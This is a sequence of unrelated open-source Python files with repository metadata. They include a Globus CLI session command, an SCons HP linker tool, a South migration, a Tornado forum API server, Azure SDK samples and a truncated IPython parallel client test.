    def delete(self, request, code):
        """Delete the story identified by ``code``."""
        return _base_request(request=request,
                             request_schema=DeleteStoryRequestSchema(),
                             response_schema=DeleteStoryResponseSchema(),
                             method=StoryServiceAgent.delete_story,
                             code=code,
                             code_name=STORY_ID)
| {
"content_hash": "61f06df96023566a6c8f192ae7b79d92",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 84,
"avg_line_length": 47.72,
"alnum_prop": 0.5456831517183571,
"repo_name": "tuanquanghpvn/rest_exam",
"id": "c5b92c19ca1be50652e77321a31e53241a97050e",
"size": "2386",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/story/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "51707"
}
],
"symlink_target": ""
} |
import time
import globus_sdk
from globus_cli.login_manager import (
LoginManager,
get_client_login,
internal_auth_client,
is_client_login,
token_storage_adapter,
)
from globus_cli.parsing import command
from globus_cli.termio import display, print_command_hint
@command(
    "show",
    short_help="Show your current CLI auth session",
    adoc_output="""Note: this output will not show your primary identity if it is not
in session. For information on your identity set use 'globus whoami'.
When textual output is requested, the output will be a table with
the following fields:
- 'Username'
- 'ID'
- 'Auth Time'
When JSON output is requested the output will also have the session id
if needed.
""",
    adoc_examples="""Display the current session with JSON output
[source,bash]
----
$ globus session show --format json
----
""",
)
@LoginManager.requires_login(LoginManager.AUTH_RS)
def session_show(*, login_manager):
    """List all identities in your current CLI auth session.

    Lists identities that are in the session tied to the CLI's access tokens along with
    the time the user authenticated with that identity.
    """
    auth_client = login_manager.get_auth_client()
    adapter = token_storage_adapter()

    # get a token to introspect, refreshing if necessary
    try:
        # may force a refresh if the token is expired
        auth_client.authorizer.get_authorization_header()
    except AttributeError:  # if we have no RefreshTokenAuthorizer
        pass
    tokendata = adapter.get_token_data(LoginManager.AUTH_RS)

    # if there's no token (e.g. not logged in), stub with empty data
    if not tokendata:
        session_info = {}
        authentications = {}
    else:
        # client-credential logins introspect with the client itself;
        # user logins go through the CLI's native app client
        if is_client_login():
            introspect_client = get_client_login()
        else:
            introspect_client = internal_auth_client()

        access_token = tokendata["access_token"]
        res = introspect_client.oauth2_token_introspect(
            access_token, include="session_info"
        )

        session_info = res.get("session_info", {})
        authentications = session_info.get("authentications") or {}

    # resolve ids to human readable usernames
    resolved_ids = globus_sdk.IdentityMap(auth_client, list(authentications))

    # put the nested dicts in a format table output can work with
    # while also converting vals into human readable formats
    list_data = [
        {
            "id": key,
            "username": resolved_ids.get(key, {}).get("username"),
            "auth_time": time.strftime(
                "%Y-%m-%d %H:%M %Z", time.localtime(vals["auth_time"])
            ),
        }
        for key, vals in authentications.items()
    ]

    print_command_hint(
        "For information on your primary identity or full identity set see\n"
        "  globus whoami\n"
    )

    display(
        list_data,
        json_converter=lambda x: session_info,
        fields=[("Username", "username"), ("ID", "id"), ("Auth Time", "auth_time")],
    )
| {
"content_hash": "be555636264b5f8f95edeb0671b0e6d6",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 87,
"avg_line_length": 30.04950495049505,
"alnum_prop": 0.6494233937397035,
"repo_name": "globus/globus-cli",
"id": "769ac1fc4b6ccc1b25136926ba0f98e2b94be4cf",
"size": "3035",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/globus_cli/commands/session/show.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jinja",
"bytes": "425"
},
{
"name": "Makefile",
"bytes": "764"
},
{
"name": "Python",
"bytes": "746729"
},
{
"name": "Shell",
"bytes": "776"
}
],
"symlink_target": ""
} |
"""SCons.Tool.hplink
Tool-specific initialization for the HP linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/hplink.py 3897 2009/01/13 06:45:54 scons"
import os
import os.path
import SCons.Util
import link
ccLinker = None

# Search /opt for the aCC compiler/linker front end; remember the first hit.
try:
    dirs = os.listdir('/opt')
except (IOError, OSError):
    # Not being able to read the directory because it doesn't exist
    # (IOError) or isn't readable (OSError) is okay.
    dirs = []

for optdir in dirs:
    # 'optdir' instead of the original 'dir', which shadowed the builtin;
    # os.path.join instead of manual '/'-concatenation
    linker = os.path.join('/opt', optdir, 'bin', 'aCC')
    if os.path.exists(linker):
        ccLinker = linker
        break
def generate(env):
    """
    Add Builders and construction variables for the HP aCC linker to
    an Environment.

    (The original docstring said "Visual Age linker" -- that is the AIX
    tool; this module configures the HP-UX link step.)
    """
    link.generate(env)

    # +s: allow shared libs found via SHLIB_PATH; suppress compat warnings
    env['LINKFLAGS'] = SCons.Util.CLVar('-Wl,+s -Wl,+vnocompatwarnings')
    # -b: build a shared library; HP-UX shared libs use the .sl suffix
    env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -b')
    env['SHLIBSUFFIX'] = '.sl'
def exists(env):
    """Return the aCC path found at module load time, or None if absent."""
    return ccLinker
| {
"content_hash": "932843c70ba6d57ab3f621951ec0ea45",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 89,
"avg_line_length": 32.014084507042256,
"alnum_prop": 0.7232732072151342,
"repo_name": "amyvmiwei/chromium",
"id": "da04010122edd3b2500250ad6add54b548af65c2",
"size": "2273",
"binary": false,
"copies": "3",
"ref": "refs/heads/trunk",
"path": "third_party/scons/scons-local/SCons/Tool/hplink.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
tests a test set of data using a specified, pre0trained model and weights
"""
from __future__ import absolute_import, division, print_function
from ibeis_cnn import utils
import utool as ut
import six # NOQA
print, rrr, profile = ut.inject2(__name__, '[ibeis_cnn.test]')
def test(data_fpath, model, weights_fpath, results_dpath=None, labels_fpath=None, **kwargs):
    """
    Driver function: load a test data set from disk.

    Args:
        data_fpath (str): path to the data file to load
        model: pre-trained model object
        weights_fpath (str): path to the trained weights file
        results_dpath (str): optional results output directory
        labels_fpath (str): optional path to the labels file

    NOTE(review): ``model``, ``weights_fpath``, ``results_dpath`` and
    ``**kwargs`` are currently unused and nothing is returned, because the
    call to ``test_data`` below is commented out -- confirm whether this
    is intentional work-in-progress.
    """
    ######################################################################################
    # Load the data
    print('\n[data] loading data...')
    print('data_fpath = %r' % (data_fpath,))
    X_test, y_test = utils.load(data_fpath, labels_fpath)
    if len(X_test.shape) == 3:
        # add channel dimension for implicit grayscale
        X_test.shape = X_test.shape + (1,)
    #return test_data(X_test, y_test, model, weights_fpath, results_dpath, **kwargs)
if __name__ == '__main__':
    """
    CommandLine:
        python -m ibeis_cnn.test
        python -m ibeis_cnn.test --allexamples
        python -m ibeis_cnn.test --allexamples --noface --nosrc
    CommandLine:
        cd %CODE_DIR%/ibies_cnn/code
        cd $CODE_DIR/ibies_cnn/code
        code
        cd ibeis_cnn/code
        python test.py
    PythonPrereqs:
        pip install theano
        pip install git+https://github.com/Lasagne/Lasagne.git
        pip install git+git://github.com/lisa-lab/pylearn2.git
        #pip install lasagne
        #pip install pylearn2
        git clone git://github.com/lisa-lab/pylearn2.git
        git clone https://github.com/Lasagne/Lasagne.git
        cd pylearn2
        python setup.py develop
        cd ..
        cd Lesagne
        git checkout 8758ac1434175159e5c1f30123041799c2b6098a
        python setup.py develop
    """
    # Running this module directly executes its doctests via utool.
    import multiprocessing
    multiprocessing.freeze_support()  # for win32
    import utool as ut  # NOQA
    ut.doctest_funcs()
| {
"content_hash": "6d297caa37b14051544f091ba55562ba",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 92,
"avg_line_length": 29.82089552238806,
"alnum_prop": 0.591091091091091,
"repo_name": "bluemellophone/ibeis_cnn",
"id": "74a2f1bb7dbb74776f65ca9135c0e0d26cd2c6ea",
"size": "2044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ibeis_cnn/test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "667619"
},
{
"name": "Shell",
"bytes": "333"
}
],
"symlink_target": ""
} |
import os
import unittest
from nose.plugins.attrib import attr
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.velpt_ab.dcl.resource import RESOURCE_PATH
from mi.dataset.driver.velpt_ab.dcl.velpt_ab_dcl_recovered_driver import parse
__author__ = 'Joe Padula'
log = get_logger()
@attr('UNIT', group='mi')
class SampleTest(unittest.TestCase):
    """Unit test for the velpt_ab_dcl recovered driver's parse() entry point."""

    def test_one(self):
        """Parse a sample .log file and verify no parse failure was flagged."""
        source_file_path = os.path.join(RESOURCE_PATH, '20140813.velpt.log')

        particle_data_handler = ParticleDataHandler()
        particle_data_handler = parse(None, source_file_path, particle_data_handler)

        log.debug("SAMPLES: %s", particle_data_handler._samples)
        log.debug("FAILURE: %s", particle_data_handler._failure)

        # assertEqual: assertEquals is a deprecated alias of assertEqual
        self.assertEqual(particle_data_handler._failure, False)
if __name__ == '__main__':
    # Allow running this single test directly, without a test runner.
    test = SampleTest('test_one')
    test.test_one()
| {
"content_hash": "7de986e256521c56063120b55ce504c6",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 84,
"avg_line_length": 28.393939393939394,
"alnum_prop": 0.7075773745997865,
"repo_name": "petercable/mi-dataset",
"id": "253eb9592c31dc62afd36b0a56773e10d462957d",
"size": "960",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mi/dataset/driver/velpt_ab/dcl/test/test_velpt_ab_dcl_recovered_driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "3604713"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.apimanagement import ApiManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-apimanagement
# USAGE
python api_management_delete_api_diagnostic.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Delete an API Management API diagnostic (generated SDK sample).

    Credentials are read from the environment by ``DefaultAzureCredential``
    (AZURE_CLIENT_ID, AZURE_TENANT_ID, AZURE_CLIENT_SECRET).
    """
    client = ApiManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id="subid",
    )

    # if_match="*" deletes regardless of the entity's current ETag
    response = client.api_diagnostic.delete(
        resource_group_name="rg1",
        service_name="apimService1",
        api_id="57d1f7558aa04f15146d9d8a",
        diagnostic_id="applicationinsights",
        if_match="*",
    )
    # NOTE(review): delete operations typically return None; the print
    # mirrors the generated sample's structure.
    print(response)
# x-ms-original-file: specification/apimanagement/resource-manager/Microsoft.ApiManagement/stable/2021-08-01/examples/ApiManagementDeleteApiDiagnostic.json
if __name__ == "__main__":
    # Entry point when run as a standalone script.
    main()
| {
"content_hash": "1879f712a214f0749efeb001956873d6",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 155,
"avg_line_length": 33.52777777777778,
"alnum_prop": 0.7257663628831814,
"repo_name": "Azure/azure-sdk-for-python",
"id": "fed262e8b393ab4251c160f1bcc1fb83ec7afdc6",
"size": "1675",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/apimanagement/azure-mgmt-apimanagement/generated_samples/api_management_delete_api_diagnostic.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the migration: drop the 'pages_pagepermission' table."""
        # Deleting model 'pagepermission'
        db.delete_table('pages_pagepermission')
def backwards(self, orm):
# Adding model 'pagepermission'
db.create_table('pages_pagepermission', (
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('type', self.gf('django.db.models.fields.IntegerField')(default=0)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['pages.Page'], null=True, blank=True)),
))
db.send_create_signal('pages', ['pagepermission'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 123021)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 122310)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'pages.content': {
'Meta': {'object_name': 'Content'},
'body': ('django.db.models.fields.TextField', [], {}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 119785)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'pages.page': {
'Meta': {'ordering': "['tree_id', 'lft']", 'object_name': 'Page'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 8, 19, 17, 37, 19, 120711)'}),
'delegate_to': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'freeze_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modification_date': ('django.db.models.fields.DateTimeField', [], {}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['pages.Page']"}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'redirect_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'redirected_pages'", 'null': 'True', 'to': "orm['pages.Page']"}),
'redirect_to_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'pages.pagealias': {
'Meta': {'object_name': 'PageAlias'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page']", 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
}
}
complete_apps = ['pages']
| {
"content_hash": "e259a440d8d30f47773b93ddb5e47c23",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 182,
"avg_line_length": 71.98,
"alnum_prop": 0.5543206446235065,
"repo_name": "pombredanne/django-page-cms-1",
"id": "174f299cbd6ad8692c6badd51a50c2ffa8e4279d",
"size": "7216",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pages/migrations/0003_auto__del_pagepermission.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "17296"
},
{
"name": "HTML",
"bytes": "29690"
},
{
"name": "JavaScript",
"bytes": "38245"
},
{
"name": "Python",
"bytes": "296427"
}
],
"symlink_target": ""
} |
from .config import get_config
from .models import IssueThread
from .utils import bugzilla_login, get_bugzilla_bug, validate_list
class Migrator:
    """Drives the Bugzilla-to-GitLab migration for a list of bug ids."""

    def __init__(self, config_path):
        # Load the migration configuration once and keep it for all bugs.
        self.conf = get_config(config_path)

    def migrate(self, bug_list):
        """
        Migrate a list of bug ids from Bugzilla to GitLab.
        """
        validate_list(bug_list)
        # Authenticate up front, but only when credentials are configured.
        if self.conf.bugzilla_user:
            bugzilla_login(self.conf.bugzilla_base_url, self.conf.bugzilla_user)
        for bug_id in bug_list:
            self.migrate_one(bug_id)

    def migrate_one(self, bugzilla_bug_id):
        """
        Migrate a single bug from Bugzilla to GitLab.
        """
        print("Migrating bug {}".format(bugzilla_bug_id))
        bug_fields = get_bugzilla_bug(self.conf.bugzilla_base_url, bugzilla_bug_id)
        thread = IssueThread(self.conf, bug_fields)
        thread.save()
| {
"content_hash": "50a1bccd1f2d9ce94b5f67960802ad57",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 80,
"avg_line_length": 33.370370370370374,
"alnum_prop": 0.6293007769145395,
"repo_name": "xmun0x/bugzilla2gitlab",
"id": "b1e565be887e6ff03724b4bfbb511ca607567475",
"size": "901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bugzilla2gitlab/migrator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "27509"
},
{
"name": "Shell",
"bytes": "44"
}
],
"symlink_target": ""
} |
from neutron_lib.db import constants as db_const
from neutron_lib.db import model_base
import sqlalchemy as sa
class AddressScope(model_base.BASEV2, model_base.HasId, model_base.HasProject):
    """Represents a neutron address scope."""
    __tablename__ = "address_scopes"
    # Display name for the scope; required (NOT NULL).
    name = sa.Column(sa.String(db_const.NAME_FIELD_SIZE), nullable=False)
    # Whether the scope is visible to all projects.
    shared = sa.Column(sa.Boolean, nullable=False)
    # IP version of the scope; presumably 4 or 6 — enforced by callers, not here.
    ip_version = sa.Column(sa.Integer(), nullable=False)
| {
"content_hash": "b038fcf0b4eef0714e50b86595180ec2",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 79,
"avg_line_length": 35.38461538461539,
"alnum_prop": 0.7304347826086957,
"repo_name": "noironetworks/neutron",
"id": "e3f08e668ef1403c01caf0b9d4e22d9858ebdddb",
"size": "1033",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/db/models/address_scope.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "11420614"
},
{
"name": "Shell",
"bytes": "38791"
}
],
"symlink_target": ""
} |
import os
import sys
# Hard-coded project root: the process chdirs there and puts it on sys.path
# so the 'api' package below resolves.
# NOTE(review): machine-specific absolute path; breaks on any other host.
root_dir = os.path.join('/', 'home', 'igor', 'Projects', 'python', 'forum')
os.chdir(root_dir)
sys.path.append(root_dir)
import functools
import json
import logging
import threading
import tornado.web
import tornado.gen
import tornado.ioloop
from tornado.options import define, options
from api import api_executor
from api.util.response_helpers import *
from api.util.DataService import DataService
# Single shared data-service instance used by every request handler.
ds = DataService()
def async_task(func):
    """Decorator that runs each call of *func* on a fresh daemon-less thread.

    Fix: the wrapper now returns the started ``threading.Thread`` so callers
    can ``join()`` it or check ``is_alive()``. The original implicitly
    returned ``None``, which made completion untrackable; callers that
    ignored the return value are unaffected.
    """
    @functools.wraps(func)
    def async_func(*args, **kwargs):
        th = threading.Thread(target=func, args=args, kwargs=kwargs)
        th.start()
        return th
    return async_func
class ThreadMixin(tornado.web.RequestHandler):
    """Request handler that runs `_worker` on a background thread and
    delivers the outcome back on the IOLoop via `results`.

    Subclasses override `_worker` and set `self.res` (response body) or
    `self.redir` (redirect target).
    NOTE(review): Python 2 syntax (`except X, e`); also `async_callback` was
    removed in later Tornado versions — confirm the pinned Tornado release.
    """
    def start_worker(self):
        # Spawn the worker thread; the request stays open until results() runs.
        threading.Thread(target=self.worker).start()
    def _worker(self):
        # Abstract hook: subclasses must produce the response here.
        raise NotImplementedError("Abstract method")
    def worker(self):
        try:
            self._worker()
        except tornado.web.HTTPError, e:
            # Propagate the HTTP status chosen by the worker.
            self.set_status(e.status_code)
        except:
            # Deliberate catch-all: any unexpected worker failure is logged
            # with traceback and mapped to a 500 instead of killing the thread.
            logging.error("_worker problem", exc_info=True)
            self.set_status(500)
        # Hop back to the IOLoop thread before touching the connection.
        tornado.ioloop.IOLoop.instance().add_callback(self.async_callback(self.results))
    def results(self):
        # Runs on the IOLoop thread; finishes the request based on worker state.
        if self.get_status() != 200:
            self.send_error(self.get_status())
            return
        if hasattr(self, 'res') and self.res is not None:
            self.finish(self.res)
            return
        if hasattr(self, 'redir'):
            self.redirect(self.redir)
            return
        # Worker set neither a result nor a redirect: treat as server error.
        self.send_error(500)
class Handler(ThreadMixin):
    """Routes /<entity>/<action> requests to the API executor on a worker thread."""
    entity = None
    action = None
    data = None
    res = None

    def _dispatch(self, entity, action, payload):
        # Stash the request parameters, then hand off to the background worker.
        self.entity = entity
        self.action = action
        self.data = payload
        self.start_worker()

    def _worker(self):
        self.res = api_executor.execute(ds, self.entity, self.action, self.data)

    @tornado.web.asynchronous
    def get(self, entity, action):
        # GET parameters arrive as the query-string arguments dict.
        self._dispatch(entity, action, parse_get(self.request.arguments))

    @tornado.web.asynchronous
    def post(self, entity, action):
        # POST bodies are UTF-8 JSON documents.
        self._dispatch(entity, action, json.loads(self.request.body, encoding='utf-8'))
class ClearHandler(ThreadMixin):
    """Handles POST /clear by wiping the database; GET is rejected."""
    res = None

    def _worker(self):
        self.res = api_executor.clear_db()

    @tornado.web.asynchronous
    def post(self):
        # Destructive operation runs on the background worker like all others.
        self.start_worker()

    @tornado.web.asynchronous
    def get(self):
        # Clearing the DB must be an explicit POST; GET gets 405 Method Not Allowed.
        self.send_error(405)
define('port', type=int, default=9001)
def main():
    """Parse command-line options, mount the URL routes, and run the IOLoop."""
    tornado.options.parse_command_line()
    # Route order matters: the generic two-segment pattern is tried first.
    app = tornado.web.Application([
        (r"/(\S+)/(\S+)", Handler),
        (r"/clear/", ClearHandler),
        (r"/clear", ClearHandler),
    ])
    logging.info("Server started on port %s", options.port)
    app.listen(options.port)
    try:
        tornado.ioloop.IOLoop.instance().start()
    except KeyboardInterrupt:
        # Ctrl-C: release DB connections before exiting.
        ds.close_all()
        logging.info("Server stopped")
if __name__ == "__main__":
    main()
| {
"content_hash": "b48be6361a32849d7eb26aa89c1c75fb",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 88,
"avg_line_length": 24.016,
"alnum_prop": 0.6242504996668887,
"repo_name": "igorcoding/forum-api",
"id": "3f6e1da16f8296e2c89c461d783f3bfc9d9a8b08",
"size": "3020",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/forumserver.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "608"
},
{
"name": "Python",
"bytes": "48289"
},
{
"name": "SQL",
"bytes": "6263"
},
{
"name": "Shell",
"bytes": "4615"
}
],
"symlink_target": ""
} |
from ._phone_numbers_client import PhoneNumbersClient
# Generated SDK package init: pull in hand-written customizations from
# ._patch when present; fall back gracefully if the module exports nothing.
try:
    from ._patch import __all__ as _patch_all
    from ._patch import *  # type: ignore  # pylint: disable=unused-wildcard-import
except ImportError:
    _patch_all = []
from ._patch import patch_sdk as _patch_sdk
__all__ = ["PhoneNumbersClient"]
# Re-export patched names without duplicating anything already listed.
__all__.extend([p for p in _patch_all if p not in __all__])
# Give the patch module a chance to monkey-patch the generated client.
_patch_sdk()
| {
"content_hash": "2908c2e64a7439279d95bc600509d772",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 82,
"avg_line_length": 29.307692307692307,
"alnum_prop": 0.6745406824146981,
"repo_name": "Azure/azure-sdk-for-python",
"id": "962219d02796e6e45567842cebad432abd90ab1a",
"size": "849",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "sdk/communication/azure-communication-phonenumbers/azure/communication/phonenumbers/_generated/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
"""Tests for parallel client.py
Authors:
* Min RK
"""
#-------------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
from __future__ import division
import time
from datetime import datetime
import zmq
from IPython import parallel
from IPython.parallel.client import client as clientmod
from IPython.parallel import error
from IPython.parallel import AsyncResult, AsyncHubResult
from IPython.parallel import LoadBalancedView, DirectView
from .clienttest import ClusterTestCase, segfault, wait, add_engines
def setup():
    # Module-level test setup hook: make sure at least 4 engines are running
    # (total=True counts existing engines) before any test in this module.
    add_engines(4, total=True)
class TestClient(ClusterTestCase):
    """Integration tests for IPython.parallel Client: view indexing, Hub
    queries (db_query/hub_history), resubmission, purging, and spin threads.

    These tests talk to a live cluster via self.client; ordering and sleeps
    are load-bearing (they give the Hub time to observe messages).
    """
    def test_ids(self):
        n = len(self.client.ids)
        self.add_engines(2)
        self.assertEqual(len(self.client.ids), n+2)
    def test_view_indexing(self):
        """test index access for views"""
        self.minimum_engines(4)
        targets = self.client._build_targets('all')[-1]
        v = self.client[:]
        self.assertEqual(v.targets, targets)
        t = self.client.ids[2]
        v = self.client[t]
        self.assertTrue(isinstance(v, DirectView))
        self.assertEqual(v.targets, t)
        t = self.client.ids[2:4]
